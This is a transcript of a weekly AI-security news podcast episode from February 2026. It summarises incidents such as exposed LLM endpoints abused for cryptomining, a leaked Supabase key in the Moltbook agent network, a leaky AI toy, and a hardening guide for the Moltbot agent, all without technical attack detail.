Modern Cyber with Jeremy Snyder - Episode 89

This Week in AI Security - 5th February 2026

In this first episode of February 2026, Jeremy breaks down a high-stakes week in AI security, featuring critical framework flaws, cloud-native exploits, and a major security warning regarding a popular autonomous AI agent.

Podcast Transcript

All right. Welcome back to another episode of This Week in AI Security, brought to you by FireTail and the team behind the Modern Cyber podcast. I've got about five or six stories to get into today. Let's get started. We're coming to you for the week of the 5th of February 2026. Here we go.

So I want to start this week's first story with something called Bizarre Bazaar. And that is bizarre, like weird, bazaar, like marketplace. So Bizarre Bazaar, rhyming intentionally. Kudos to the team over at Pillar Security for uncovering this. Now, they uncovered this by planting some honeypots that look like weakly protected LLM infrastructure endpoints. And what this involves is threat actors gaining unauthorized access to these endpoints, and they are using that access to steal computing resources for cryptocurrency mining. They're also reselling API access on dark markets. So they'll say, like, hey, we found this compromised Ollama instance that we have an API key to, who wants to use it? Exfiltrating data from prompts and conversation history. Attempting to pivot into internal systems via MCP servers. MCP we're going to talk about a little bit more in today's episode, but for those who are not familiar, that's Model Context Protocol. It's a way of kind of exposing an LLM programmatically to other pieces of software that want to interact with it.

And the most common attack vectors are self-hosted LLM setups exposed, or unauthenticated APIs in front of those setups, publicly accessible MCP environments, and development or staging environments with public IP addresses. A couple of things to note here. So, aside from the exfiltration of the prompt data, these are not AI-specific attacks. These are actually typical attacks on infrastructure that backs LLMs. And so, you know, if you think about the things we've talked about in many of the previous episodes of This Week in AI Security, we've got a recurring theme of the infrastructure and the services powering the LLM environment as being really kind of the weak point and the things to focus on when you're building your layered defense or defense-in-depth strategies. And important to understand here is that LLMs have known patterns. They have known ports that are exposed, they have known API structures, and many are, for instance, copying OpenAI as the most popular provider. They're copying OpenAI's APIs and making them compatible, so you could swap out models without having to redo your application code. Exposed APIs in front of this infrastructure get indexed quickly and can be searched on Shodan. I always tell people anything on the internet can be found, and generally way faster than you actually think it can be found, so it's something to really keep an eye out on. Make sure that if you're putting an LLM-powered application online, you're taking appropriate measures to make sure that you're only exposing exactly the things you mean to, you're tightening up security around some of that exposed infrastructure, etc.

All right, moving on to the next story. We've got a CVE on an MCP server. So I mentioned that we're going to talk about Model Context Protocol a little bit. And so Model Context Protocol is again a way for LLMs to interact with other LLMs, or for software to interact with LLMs, or some combination thereof. A lot of people think about it as kind of being the LLM wrapper around an API. And so the parallel that most people draw is between MCP and APIs. And what we've got here is a CVE, so again a common vulnerability or enumeration, on a Gemini MCP tool that allowed remote code execution. So Gemini we've talked about many, many times with various things, including disclosures that the FireTail team has done, you know, very popular service from Google. Pretty common CVE, a little bit more of the same. We've talked about this theme or this category of vulnerabilities on previous episodes. I'm not going to go into more details other than to just remind you that, as always, all of our stories are linked from the show notes. You can get more information there.

All right. Moving on to our next story, Moltbook. So we talked last week quite a lot about the Clawdbot, C-L-A-W, not Claude from Anthropic, uh, now renamed into Moltbot. This is meant to be a kind of, you know, super agent for personal productivity purposes. And, you know, one of the craziest developments over the last couple of weeks has been the launch of this and then the launch of something called Moltbook, which is like a Facebook for these AI agents to interact with each other. It actually has more of a Reddit-style interface, and it's more of a kind of, like, you know, comment and response. And somebody posts a thread and the conversation continues from there. And again, the vulnerabilities here and the security incident here are not specific to the LLM aspect of it. In fact, you know, the Moltbook social network was vibe coded, meaning that it was created by the creator of Moltbot, who just said, hey, I have a vision for this thing. I went to an AI-powered coding assistant, something like Claude Code or something like Lovable or Base44 or one of these platforms, and I just described what I wanted, and then the AI wrote the code for me.

So the research team over at Wiz poked around a little bit. It did not take them very long to find a Supabase, which is a kind of a NoSQL database, API key exposed in client-side JavaScript. They were able to then use that API key also to understand the front-end interaction with the backend, get instructions on where to access the Supabase instance, then unauthenticated access to the entire production database, including 1.5 million API keys and lots more data in there. So again, the infrastructure around the applications is the weak point. Are you sensing a theme? I am a little bit.

All right. Moving on. What I actually wanted to highlight for our next story is a really good write-up from a noted security researcher named Eyal Estrin. I hope I'm getting that name right. Eyal is somebody whose work I've followed for several years. He is a well-known researcher, especially in cloud security, in areas like that, um, based in Israel. I don't know his company affiliation at this point, but he put out a nice guide to how to secure this thing. So if you still think that the productivity gains are worth it and you want to deploy this agent for your own purposes, you might want to have a read through this guide on things to do. I'm just going to read off the kind of six to eight recommendations and talk a little bit about my analysis of them. So number one, lock down the gateway. Um, by default this Moltbot thing will actually get access to everything. But maybe you don't want that to be the case. And also maybe you don't want it to have kind of a reverse proxy effect where it exposes things from your local machine onto the internet. So lock down that gateway.

Number two, enforce strict access control. So who can access what? Well, that also applies to this kind of agentic thing. What can it access? Number three, isolate the runtime environment. This in my mind is very parallel to micro-segmentation from networks. Reduce the blast radius. So if all things do go wrong, how can you actually control and contain what this thing might have access to? Number four, apply least privilege to agent capabilities. This is very much an identity-focused control. Make sure that you're only granting permissions to do the things that you're comfortable with it doing. Maybe you want it to be able to create calendar events, but not read, or maybe not to edit or update, right? So think about what level of permissions you want to give this agent. Number five, secure credentials and secrets. This is just good secret management. You know, make sure that you're not giving it passwords in plain text. Make sure that you are using good practices like environment variables instead, or encrypting these secrets in some way.

Number five, continuous, or maybe number six, continuous auditing and monitoring. Log this stuff. Log what it's doing. Be, you know, have the ability to go back and check if you're concerned: hey, did this do something that I didn't expect it to do? Well, you've got the logs. Make sure you've turned that on. Number seven, harden browser automation. The browser is one of the main things that this bot is known to use. And so what you want to do is you want to make sure that the Chromium-based browser automation is secure, is good code, and is only, again, having access to the things you want. Number nine, I think I might have lost track, prompt-level safety rules. Check the prompt, give it some guidelines on what it is and is not allowed to prompt. And last but not least, incident response preparedness. So when, and if and when, things do go wrong, how are you going to recover from this? So think through some worst-case scenarios and then just map out to yourself, maybe you just jot it down in a notepad or something like that: what if it messes up my calendar? What if it texts someone or sends out some files that I don't want it to send out? Then what am I going to do about that? The interesting thing to me from that entire list: the only AI-specific control in there is prompt-level safety rules. Everything else is kind of a core cybersecurity principle, foundational thing, foundational control: micro-segmentation, least privilege, things that we would have all heard again and again and again. So again, the link is in the show notes. Nice little guide. Good read. Quick read. Gives you some real thoughts about what to do in a practical sense.

All right, moving on. Bondu. Bondu is an AI-powered dinosaur toy. I heard about this story via Australia and a news source down in Australia. I don't know if this is something that is an Australian company and hasn't made it outside Australia just yet, but it is an AI-powered dinosaur toy. And again, this is the infrastructure around the application that is really to blame. So the chat logs were actually available to anyone with a Gmail account. So if you or your child was interacting with this thing, that is most likely a kind of, um, speech-to-text mechanism that then kind of goes back to the LLM, retrieves the responses, etc. for that interaction. 50,000 chat log records exposed to anybody with a Gmail account. So the kind of authentication that was applied there was really not super great, super controlled.

All right. Moving on to our last story for the week. This is something that definitely hit the headlines in a lot of different places around the world. Trump's acting cyber chief uploaded sensitive files into a public version of ChatGPT. So about a year ago, a gentleman with the last name Gottumukkala was appointed as the interim head of the country's cyber defense agency, CISA, and had requested access to ChatGPT. That access was actually not approved. Um, but an exception was granted on a temporary basis. Uh, and then this gentleman proceeded to upload four documents. Now, none of those documents were marked as classified, but they were marked For Official Use Only. And so uploading into ChatGPT might actually be within bounds if you're using the enterprise version, but he used the public version, and the public version, as has been widely reported, has IP rights, ownership and access to the data for training purposes and whatnot. So this is considered a pretty serious, if not security breach, let's say, data mishandling and privacy breach of potentially sensitive information.

This is the kind of thing that makes you step back for a second and say, well, wait, wait, wait, what's going on here? Are our most trusted institutions and organizations not following core basic guidelines? Or is it the case that the temptation of AI and the benefits are actually just too good to ignore? Or maybe both. I'm going to leave you with that thought to kind of ponder on your own. That's our last story for this week. Again, signing off for the week of the 5th of February 2026. As always, rate, review, like, follow, subscribe, all that good stuff. If you've got any stories, send them our way and we will talk to you next week on This Week in AI Security. Bye bye.
